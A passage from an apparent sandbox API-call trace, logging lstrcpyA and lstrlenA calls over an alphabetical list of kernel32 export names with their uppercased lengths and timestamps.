lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.491] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.491] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.491] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.491] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.491] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.491] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.491] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.491] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.491] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.491] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.491] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.491] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.491] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.491] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.491] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.491] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.492] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.492] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.492] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.492] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.492] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.492] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.492] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.492] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.492] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.492] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.492] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.492] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.492] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.492] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.492] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.492] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.492] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.493] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.493] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.493] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.493] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.493] lstrlenA (lpString="BEEP") returned 4 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.493] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.493] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.493] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.493] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.493] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.493] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.493] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.493] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.493] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.493] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.493] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.493] lstrlenA (lpString="CANCELIO") returned 8 [0079.493] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.494] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.494] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.494] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.494] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.494] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.494] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.494] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.494] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.494] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.504] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.504] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.504] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.504] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.504] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.504] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.505] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.505] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.505] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.505] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.505] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.505] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.505] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.505] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.505] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.505] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.505] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.505] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.505] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.505] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.505] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.505] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.505] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.505] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.505] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.506] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.506] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.506] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.506] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.506] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.506] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.506] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.506] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.506] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.506] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.506] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.506] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.506] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.506] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.506] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.506] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.506] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.506] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.506] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.507] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.507] lstrlenA (lpString="COPYFILEA") returned 9 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.507] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.507] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.507] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.507] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.507] lstrlenA (lpString="COPYFILEW") returned 9 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.507] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.507] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.507] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.507] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.507] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.507] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.507] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.507] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.507] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.507] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.507] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.507] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.507] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.508] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.508] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.508] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.508] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.508] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.508] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.508] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.508] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.508] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.508] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.508] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.508] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: 